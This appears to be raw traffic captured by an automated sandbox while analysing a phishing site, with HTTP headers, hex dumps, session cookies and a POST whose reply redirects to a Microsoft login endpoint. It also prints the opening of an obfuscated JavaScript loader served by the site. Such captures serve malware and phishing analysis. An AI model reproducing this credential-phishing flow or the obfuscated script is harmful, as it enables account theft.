                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de6456c8aeae73b-DEN
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=18957&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1882&delivery_rate=152621&cwnd=32&unsent_bytes=0&cid=f064ede0206b8e5a&ts=846&x=0"
                                                                                                                                              2024-11-06 15:56:01 UTC260INData Raw: 77 4f 46 32 00 01 00 00 00 01 6c 5c 00 14 00 00 00 04 b2 20 00 01 6b e0 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a a4 76 1b 83 bb 26 1c 93 24 3f 48 56 41 52 a0 6a 3f 4d 56 41 52 81 46 06 60 3f 53 54 41 54 81 36 27 38 00 91 18 2f 81 48 11 08 0a 81 f8 0c 81 d3 78 0b 89 1a 00 30 8b e7 3a 01 36 02 24 03 92 30 04 20 05 97 7a 07 a2 17 5b 12 9a 94 07 25 22 db df 13 ba a5 ab c1 a5 a2 a8 fe 21 df bb 49 da 54 19 b0 7f a9 77 90 21 63 9b 48 1d ce cd 74 1d 5d 6b a5 08 9e a7 0f c8 36 9d f1 82 43 79 c3 a8 7f 55 6c b7 72 65 ff ff ff ff ff ff 9b 92 49 8c e9 25 e8 25 f9 7f 00 15 44 45 b1 a0 ba ce 76 d3 69 ae 51 46 38 dc dd 84 83 d2 69 48 19 21 72 0a ca e2 f4 da d1 50 34 5a 5b b9 db ae 1d f6 5a 73 10 9e 89 b6 6f 06 0e 72 ef e2 38 62 1c 4f e8
                                                                                                                                              Data Ascii: wOF2l\ kv&$?HVARj?MVARF`?STAT6'8/Hx0:6$0 z[%"!ITw!cHt]k6CyUlreI%%DEviQF8iH!rP4Z[Zsor8bO
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: 19 c7 21 ef 85 0b 87 09 13 e9 52 7d 47 4c 0e c3 35 6e 21 02 bb de e5 5e e4 9b b2 cb 49 10 e5 82 c3 41 89 fa 8c 03 e7 80 55 08 8a bb 2c 26 bf 84 75 7a a2 bc 81 1a 45 7f 52 ae 4b 2f 47 4c d1 0e eb 23 c5 82 f2 55 13 14 41 38 25 09 72 64 c4 d3 45 2c 7d a1 88 b0 27 65 e7 c3 80 f1 75 10 eb 82 33 17 64 44 9a 0c d1 e1 7d c8 bc 9f 3a ee fe 30 9b 61 ba 8a 23 4f 38 bb 7c c4 37 ee e8 7b dc a7 7d 85 6f 10 dd 17 fe 9a bf 28 bc 44 dc 91 8f 48 58 1f 0d d2 77 aa 3b 46 e2 0a 17 67 b8 2b 17 f1 1e ee 98 67 0e 78 af ae 2c af 40 7e 3c cf 4b ce cd d7 94 da c8 d9 5a 4a 77 dc 1e 1c e6 94 fa f2 5e 86 21 e5 cb 7b 3a 88 0f 3c 9b dd 60 4e e1 e2 68 da 14 30 c9 74 85 ab 4e 41 aa d7 2c 7f d0 ca 5d 8b 82 8e 97 b8 a4 16 c9 86 4f 6e f3 a3 ad 2f a5 14 58 7c 5f 3d a5 d4 d7 65 2c a5 74 53 f9
                                                                                                                                              Data Ascii: !R}GL5n!^IAU,&uzERK/GL#UA8%rdE,}'eu3dD}:0a#O8|7{}o(DHXw;Fg+gx,@~<KZJw^!{:<`Nh0tNA,]On/X|_=e,tS
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: 6b e1 1a 39 c9 03 82 2b 28 62 54 e4 2a b3 77 9b e4 02 05 b6 7d 55 62 5f 4d 28 19 54 d5 53 a1 fe 7f af 9b 27 1d 42 5e 8a 2a 4d 61 f7 78 4a d7 99 24 18 8f 95 38 f5 77 78 da 56 ff de 0c cc d0 da 7b 5b e9 66 5e ed 60 5c 44 fd fd 51 cd 63 86 92 30 41 0c 10 03 14 29 89 14 10 8c 5a d7 55 37 4a dd a8 73 23 2f b7 5c a6 f3 78 cf 08 c4 90 6e f8 fc cf 99 19 00 3e 7f 6a 6a 0a d8 4e 4e 48 14 16 00 83 f8 39 50 48 53 c0 cb 41 71 40 9e 58 9d 50 6b 7f 80 7e 86 29 43 64 38 04 73 eb ac 0f ab 51 b2 25 63 2c 93 45 b3 66 1b 63 c9 d8 46 f4 18 25 51 23 86 44 0a 4a 98 88 51 98 f9 7e 94 be cf b7 5f 6d d1 58 9b 43 ac 9a ec ef 1d a2 f6 e2 82 98 95 48 a4 54 ef 24 42 22 54 b0 70 b3 90 e5 d0 53 52 3d fc 7f 2f f7 ef fd 14 73 02 79 87 75 ea 78 45 98 de 7d 3a 13 ef be 36 fb aa 20 8c 54 21
                                                                                                                                              Data Ascii: k9+(bT*w}Ub_M(TS'B^*MaxJ$8wxV{[f^`\DQc0A)ZU7Js#/\xn>jjNNH9PHSAq@XPk~)Cd8sQ%c,EfcF%Q#DJQ~_mXCHT$B"TpSR=/syuxE}:6 T!
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: 02 79 f8 fd 64 32 f8 09 c2 23 f7 e2 70 d1 d1 c9 3b f3 0e 00 18 00 94 f8 6a dd 3a 62 8a c5 68 b4 dd 4e 26 7b bd 74 7a 30 c8 e7 c7 63 6d a6 d3 6a 75 b1 68 36 d7 eb b0 6c b7 c3 21 4d 7b c3 b2 f3 b9 20 ac 56 b2 5c 90 e5 a2 aa 00 e8 3a 18 c6 c6 b2 78 1e 42 51 74 9c e2 dd 8e 82 31 b9 81 40 3c fe 02 45 0b 86 21 08 49 2e a4 52 50 d4 64 18 1c ef 93 20 58 56 85 e7 d3 69 41 08 42 81 b3 59 8b 28 72 9c 24 59 96 17 e7 72 37 aa 5a f2 79 45 29 30 28 72 4a 82 92 40 4a 94 b2 d6 60 cc 61 2e d7 35 c5 39 6b bd 1f 84 70 04 f9 eb 29 3e 3a f2 e6 70 d0 42 8c 29 7d bf fc 53 55 08 71 64 b7 f5 76 7e de bd 3e ef b3 ad d1 64 ac 45 09 43 4d 00 13 52 a1 14 c6 cc 39 08 81 94 e1 59 d7 41 b0 48 10 6c b7 4a 89 d6 52 1a 83 b5 38 47 18 ce 28 fa f1 6d 62 3a 8e 5f 24 09 69 4a 96 95 3c 5f 2c 8a
                                                                                                                                              Data Ascii: yd2#p;j:bhN&{tz0cmjuh6l!M{ V\:xBQt1@<E!I.RPd XViABY(r$Yr7ZyE)0(rJ@J`a.59kp)>:pB)}SUqdv~>dECMR9YAHlJR8G(mb:_$iJ<_,
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: e8 42 8d cb 52 2e e7 b5 55 fc e7 e4 60 b1 88 1c 02 a2 4c ad e2 4a c0 a7 71 de f5 83 2c 93 d1 af ba 96 1a ac d4 fd a9 01 f2 00 e4 f3 c9 4b c9 31 22 75 bc 5f af 93 71 45 48 68 20 6a ce 87 d4 5e 6d c8 92 b3 9b 33 02 45 51 e3 91 59 f6 88 6e 11 41 c9 51 d4 07 af b7 01 06 c8 6a c4 96 af dd 69 f0 0f d8 2a e2 6c 0f 28 6b 62 73 c4 d9 65 0c f8 d4 d4 09 f8 01 4f de 00 9e 3c 65 77 fb 95 b2 51 cd 5a 2d 2b f5 cc 75 78 4c af fb 96 83 c8 47 b6 7e c9 c9 31 e8 2e 43 ee 30 e2 88 71 87 4c 38 68 ca 7e 33 f6 9a b3 db 82 9d 73 49 48 dd 97 33 02 6c b7 62 eb dc 50 aa db df 51 37 61 c3 6d 2b 1f 89 6c 26 ac 64 4c bb b3 c3 d4 b4 9e e6 82 bc 81 ef 9f 57 54 9b c0 44 44 18 6a cc b6 f5 ce 58 cb 9e 1c 62 8c 79 4e e5 92 a9 84 25 a6 64 7d 45 ab 35 b2 17 a9 3c 2b f7 b4 ef 9b 5a 8d 56 ad 6a
                                                                                                                                              Data Ascii: BR.U`LJq,K1"u_qEHh j^m3EQYnAQji*l(kbseO<ewQZ-+uxLG~1.C0qL8h~3sIH3lbPQ7am+l&dLWTDDjXbyN%d}E5<+ZVj
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: 76 0d 32 11 48 04 00 7e 05 4e 0d eb 27 75 3c 6c 2c 6c c3 77 3b c3 70 2f 60 4d 31 dc 0b 04 77 e6 7c 3e 08 bf d8 ae a8 6d 33 4b 77 ab fe 6d 4b 26 9b 99 f5 f8 32 b7 6b 0f b8 bf 83 50 1d ee 08 8b 97 e8 34 77 fc e5 f1 38 0e 97 80 b0 b2 db a3 1e 8d 47 d2 b7 45 f8 ab ba 35 d4 b0 2d 4c f4 7d fc f3 6d 4d 5e 76 d5 64 74 6e 2f 82 b1 f0 ba 4b d3 55 ea 85 b5 62 be 83 e1 69 86 6a b8 c8 8b c1 5a 4a a7 c5 11 6f 33 73 2e f6 36 fe aa 50 09 03 a4 df ff 20 62 90 9f 7a 3c 54 2d ee db 6f 86 1a 42 b8 06 61 c8 b8 4c 63 74 4b 67 b7 25 94 42 e4 80 77 f2 e4 71 78 aa 0d 93 d0 11 8b 6c 8e 39 7b d9 62 0f ab 99 71 5b 25 5a a0 b1 8b d0 01 6a 9b a6 58 47 b9 db 32 e1 39 12 12 4d eb 04 87 1f d9 6d 71 2d 35 28 83 e7 2b b1 04 52 dc ec b4 04 6f d4 b1 f8 8c b7 46 8f 0d 17 76 b0 f0 4d 0f 84 f8
                                                                                                                                              Data Ascii: v2H~N'u<l,lw;p/`M1w|>m3KwmK&2kP4w8GE5-L}mM^vdtn/KUbijZJo3s.6P bz<T-oBaLctKg%Bwqxl9{bq[%ZjXG29Mmq-5(+RoFvM
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: 73 b7 fe 81 58 e0 38 ed af 97 31 12 0c 48 e1 f9 c9 a4 05 3d 65 49 26 ef b5 8a d8 5c c1 66 d9 9b 7f 4a 61 a4 ad 89 d2 bb 3a 50 80 24 57 2b 3c 37 75 4a a4 39 6c fd 00 ea 85 4e 3b d1 c2 7d 2a 16 aa 37 04 44 84 b4 15 68 36 d7 58 3c c7 7b 64 ad 83 d4 40 7b ae 43 1d 30 a1 9f dc 34 b4 b9 58 af 48 29 03 7d 8d e5 0a e4 80 1a 54 40 49 9e d6 ed 54 8c 1a 33 b6 75 12 46 2c f1 86 29 13 ec b0 ac 2e 4d 03 ff e1 d0 5e e0 b6 1f 78 4e e1 05 af 16 7e ae 78 b5 5c 88 e9 3d 2f aa fc 1c 9c 77 84 19 8f 32 b7 b3 ad 8a e3 ba 21 3a 1e f6 66 ed 44 5f 78 88 5b cf 4e f3 b8 70 1e d3 ed 25 43 1a e8 25 13 2b 5e b8 7f 0d 84 0f bb 88 fa ca 7e b0 b4 80 f9 34 ed d7 83 84 91 64 d9 17 00 f7 74 b6 fa 53 09 fb db 12 f0 46 d0 fe c6 5b eb a9 c2 9d 41 ab 1c 7c de 7f 33 ba d7 4c 0e 9c 51 f5 60 ca 00
                                                                                                                                              Data Ascii: sX81H=eI&\fJa:P$W+<7uJ9lN;}*7Dh6X<{d@{C04XH)}T@IT3uF,).M^xN~x\=/w2!:fD_x[Np%C%+^~4dtSF[A|3LQ`
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: 68 3b 09 0d 48 30 b4 aa f6 37 ec 1d b1 56 da 1c 80 5e 6b 61 1a 3d f7 6a 85 cb 7d 36 b4 33 47 16 4a 86 79 29 a7 b0 5d cd ca ec 3d 02 27 36 a9 9e 9c 91 a0 c8 7e d0 77 09 b5 6c 85 91 57 85 bd 0f 93 70 89 ba a1 2c 89 43 4c e9 1a c6 79 86 00 17 c2 d5 04 6d dc 34 d6 3d f3 a3 ed f9 e1 93 87 26 87 2a 6a d6 2e 84 e4 84 a0 1c 47 71 9c 6a 88 71 eb 87 be 57 98 bd a7 03 58 ba 74 ae dc ed 27 ae 86 3b 8b 11 4e c2 ad d0 7f 0e 40 70 00 c2 f9 c0 06 82 1b 3c 78 e0 c5 97 fd 66 69 01 42 20 c2 b0 11 01 04 06 1b 38 2c 04 20 a2 f0 42 22 48 0c 2e 68 60 58 a0 38 e0 78 70 84 f0 36 2b 92 20 c4 c9 59 31 eb 42 a5 e1 99 b3 82 84 24 88 d4 83 20 69 c5 3a 5d d2 07 4b bf b7 26 1a 60 0b c5 28 4f 20 9b 5d 84 ed 82 66 f7 0b 21 e1 a0 f8 d3 1f 96 0d c5 11 ff 8f 92 e4 5a f9 40 6e 70 1d 27 b7 ba
                                                                                                                                              Data Ascii: h;H07V^ka=j}63GJy)]='6~wlWp,CLym4=&*j.GqjqWXt';N@p<xfiB 8, B"H.h`X8xp6+ Y1B$ i:]K&`(O ]f!Z@np'
                                                                                                                                              2024-11-06 15:56:01 UTC1369INData Raw: 23 29 db aa 71 f1 db 56 6f 5d f0 b7 70 cb d1 68 01 cf d7 3c d7 47 61 79 5c 27 a1 a7 7b 4b 40 b8 be 47 46 8f d4 93 59 87 ec 0e f0 5d 9b ac 6c f2 eb fa d4 3c d6 d4 a5 ee 5a 09 a0 d8 d4 06 0f fd 8b 7e ad 49 60 dd df af 12 ad 1c 53 69 a6 ff b8 4b 8c fc f7 31 74 ed 67 cb 9c 3a 7f 4c 63 68 fe 21 c1 65 ec 8f 59 dc fa 1f fb e4 79 0a f2 6a 85 7c c8 0d 95 05 17 61 45 50 0c 27 48 8a 66 58 8e 17 c4 f8 73 b4 d8 c4 b2 9d 6e fd 1e 20 21 6c 2b 02 8a e1 04 49 d1 0c cb f1 82 58 ea 4a 19 45 ad 75 a8 8e 61 5a ed ce 75 70 bd 87 cd 21 62 af 76 84 9f 23 51 57 de 1e a5 db 58 86 72 f4 e5 de eb 31 90 cf b7 1f 0c be bc 0b 06 fe 8a 1e 00 0b d9 b4 8e a7 87 49 5c 88 64 4c 40 31 59 38 61 51 96 45 f1 56 22 a5 f2 71 de e2 35 b8 c4 a3 aa 66 f5 76 6a 31 f5 da 10 6b 7c 6c 2a 68 49 6b da 60
                                                                                                                                              Data Ascii: #)qVo]ph<Gay\'{K@GFY]l<Z~I`SiK1tg:Lch!eYyj|aEP'HfXsn !l+IXJEuaZup!bv#QWXr1I\dL@1Y8aQEV"q5fvj1k|l*hIk`
                                                                                                                                              2024-11-06 15:56:02 UTC1369INData Raw: af 8e 70 f3 a7 99 8f 22 98 f7 02 af 2f 46 50 0c 27 48 01 45 33 2c 27 7c ce 90 84 47 cd 09 4f e1 95 a2 52 d7 14 6a d1 d5 63 b0 b3 77 e8 84 b3 4b 04 50 7d a2 c1 60 71 78 02 91 44 a6 50 69 f4 65 f0 36 9a e2 e6 be 20 06 29 8c b0 96 cd f3 38 70 97 27 88 f1 11 08 45 62 89 54 26 57 28 55 6a cd 6a 05 3a 1d 7a c3 e5 98 da df 33 99 2d d6 b6 b6 76 1c 4e d7 e7 f7 a6 b7 db 9e 6f 0e ae de 97 ad d1 81 af b9 39 78 24 00 e8 22 c7 ef 92 72 02 b9 ec 11 7c 29 89 de c4 85 7f 6f b3 a9 2f 79 d1 0f 6e 5e 15 32 9d 87 87 5c 2b 14 94 60 2a 6a 9a cf d0 9a 90 f5 68 c8 f5 5f 0e 09 57 64 88 f8 f7 4c 10 00 dd 83 a3 b9 29 ac 48 a7 c6 e5 61 cb ad 07 3a 3c ec d0 28 67 6d 53 4b cf 65 79 8e f5 c3 6b 6d b6 cb f8 97 ac 58 1f 71 7d a6 ef 54 59 ca 49 48 80 16 39 e0 53 09 c5 10 a0 2a 28 4d 42 ad
                                                                                                                                              Data Ascii: p"/FP'HE3,'|GORjcwKP}`qxDPie6 )8p'EbT&W(Ujj:z3-vNo9x$"r|)o/yn^2\+`*jh_WdL)Ha:<(gmSKeykmXq}TYIH9S*(MB


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              70192.168.2.1849842188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:01 UTC1454OUTPOST /yf76EadsgQyK5Jwh8E6cIKXM1akRlkqgnjcDg3IU0lvqLFvh HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Content-Length: 55
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              Accept: */*
                                                                                                                                              Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                              X-Requested-With: XMLHttpRequest
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Origin: https://ns.califragilist.com
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:01 UTC55OUTData Raw: 70 61 67 65 6c 69 6e 6b 3d 38 48 64 39 74 25 32 46 59 43 72 53 71 44 33 63 30 68 48 37 4e 6e 34 67 25 33 44 25 33 44 26 74 79 70 65 3d 34 26 61 70 70 6e 75 6d 3d 31
                                                                                                                                              Data Ascii: pagelink=8Hd9t%2FYCrSqD3c0hH7Nn4g%3D%3D&type=4&appnum=1
                                                                                                                                              2024-11-06 15:56:05 UTC1191INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:05 GMT
                                                                                                                                              Content-Type: application/json
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Cache-Control: no-cache, private
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=POX%2Bq7yHOsFvFs978M%2FUXJAOKFBqDtURXFi7s0rzSfneFbuHiLIIeqKeMuSy6FuTIZSgipmJOBGuw8IvbsvIJBQ%2BklsZxDVyHYBjcfNV%2FLJBEARV%2FOydv5dZeLOiyA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=12433&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2431&delivery_rate=231199&cwnd=219&unsent_bytes=0&cid=77be055ac6539d41&ts=3714&x=0"
                                                                                                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6IlRjNGdzdE1qREM0Y01uZmVRWnFBT2c9PSIsInZhbHVlIjoiSkd0UXJWbU9EYWxHZWZhN2lkNTY3YVJWcFJuaEI3UDhiNForZ1RvZml2eUlSTDgvakVWcEt2cHpITndCaTQ0QThqak9CS08wQWFXcjNJMURId2dCc2ZsdENpVlhyR2lMWXN6Q0U3a24xQWNYaU0xcE5KVCtiMkpHM2wyT1BYWVkiLCJtYWMiOiI2M2Q3ZjFkNGExMDQwNDcyOTcyNDgxZDZhNzU3M2QwNDI2ZTk3ZGFjMzk2NjFhMDE2ZDJiMTdkMDZiMzZhNTEwIiwidGFnIjoiIn0%3D; expires=Wed, 06-Nov-2024 17:56:05 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                              2024-11-06 15:56:05 UTC731INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 56 4c 5a 7a 4a 51 51 32 6c 6d 63 46 5a 46 62 46 46 33 53 45 64 57 62 6a 52 6b 55 30 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 5a 30 39 6e 5a 44 56 78 51 6e 5a 71 59 6b 6f 79 57 6e 64 4a 4f 48 56 50 65 45 67 7a 52 30 52 68 4e 56 42 35 62 6d 4e 42 4f 46 6f 31 57 58 70 78 54 46 56 58 59 6b 52 6c 62 7a 64 52 53 32 52 30 53 6d 46 5a 5a 48 70 4a 56 31 42 52 52 47 39 46 62 6e 4e 56 63 7a 4d 32 61 6e 6c 69 5a 43 74 43 4f 48 55 76 51 6d 56 44 4e 6d 6c 68 53 45 68 4c 65 6c 70 44 53 7a 68 53 63 47 64 6e 52 55 64 32 54 58 6c 6a 56 6d 31 74 57 55 4a 61 65 55 64 4d 5a 45 67 33 4d 33 59 77 61 58 4e 7a 55 30 4e 45 4c 31 67 33 61 6b 52 56 53 30 45
                                                                                                                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IkVLZzJQQ2lmcFZFbFF3SEdWbjRkU0E9PSIsInZhbHVlIjoiZ09nZDVxQnZqYkoyWndJOHVPeEgzR0RhNVB5bmNBOFo1WXpxTFVXYkRlbzdRS2R0SmFZZHpJV1BRRG9FbnNVczM2anliZCtCOHUvQmVDNmlhSEhLelpDSzhScGdnRUd2TXljVm1tWUJaeUdMZEg3M3YwaXNzU0NEL1g3akRVS0E
                                                                                                                                              2024-11-06 15:56:05 UTC97INData Raw: 35 62 0d 0a 7b 22 65 78 70 69 72 65 64 22 3a 30 2c 22 72 65 64 69 72 65 63 74 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6f 6d 5c 2f 63 6f 6d 6d 6f 6e 5c 2f 53 41 53 5c 2f 50 72 6f 63 65 73 73 41 75 74 68 22 7d 0d 0a
                                                                                                                                              Data Ascii: 5b{"expired":0,"redirecturl":"https:\/\/login.microsoftonline.com\/common\/SAS\/ProcessAuth"}
                                                                                                                                              2024-11-06 15:56:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              71192.168.2.1849841188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:01 UTC1284OUTGET /34ZDG48CiIUIKX2LghMRxuoYEP67110 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:01 UTC1045INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:01 GMT
                                                                                                                                              Content-Type: application/javascript
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="34ZDG48CiIUIKX2LghMRxuoYEP67110"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mbxXM4cJB4MLF6p4l5krUdROoKcQNgpfbm3Y5yC%2BekssDJqvMnsJ3jm9YOlm1%2Fcq5WwIq9mE59xtkIUSCmtFKeurfNIhIlVGOMHq1HCxcd4tY%2FvnArVYbHT%2FfzUkUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3323&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2206&delivery_rate=849765&cwnd=251&unsent_bytes=0&cid=ace9c94c115ff81b&ts=130&x=0"
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de6456c8b8fe97a-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1376&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1862&delivery_rate=2042313&cwnd=242&unsent_bytes=0&cid=142464a36a51ef89&ts=683&x=0"
                                                                                                                                              2024-11-06 15:56:01 UTC324INData Raw: 33 37 39 32 0d 0a 63 6f 6e 73 74 20 5f 30 78 31 65 66 30 31 39 3d 5f 30 78 32 32 65 39 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 32 66 66 65 31 2c 5f 30 78 33 39 65 61 32 38 29 7b 63 6f 6e 73 74 20 5f 30 78 34 36 30 39 63 61 3d 5f 30 78 32 32 65 39 2c 5f 30 78 33 66 32 61 37 34 3d 5f 30 78 34 32 66 66 65 31 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 31 30 32 34 32 33 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 30 39 63 61 28 30 78 31 39 30 29 29 2f 30 78 31 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 30 39 63 61 28 30 78 61 61 29 29 2f 30 78 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 30 39 63 61 28 30 78 32 31 30 29 29 2f 30 78 33 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 30 39 63 61 28 30
                                                                                                                                              Data Ascii: 3792const _0x1ef019=_0x22e9;(function(_0x42ffe1,_0x39ea28){const _0x4609ca=_0x22e9,_0x3f2a74=_0x42ffe1();while(!![]){try{const _0x102423=-parseInt(_0x4609ca(0x190))/0x1+parseInt(_0x4609ca(0xaa))/0x2*(-parseInt(_0x4609ca(0x210))/0x3)+parseInt(_0x4609ca(0
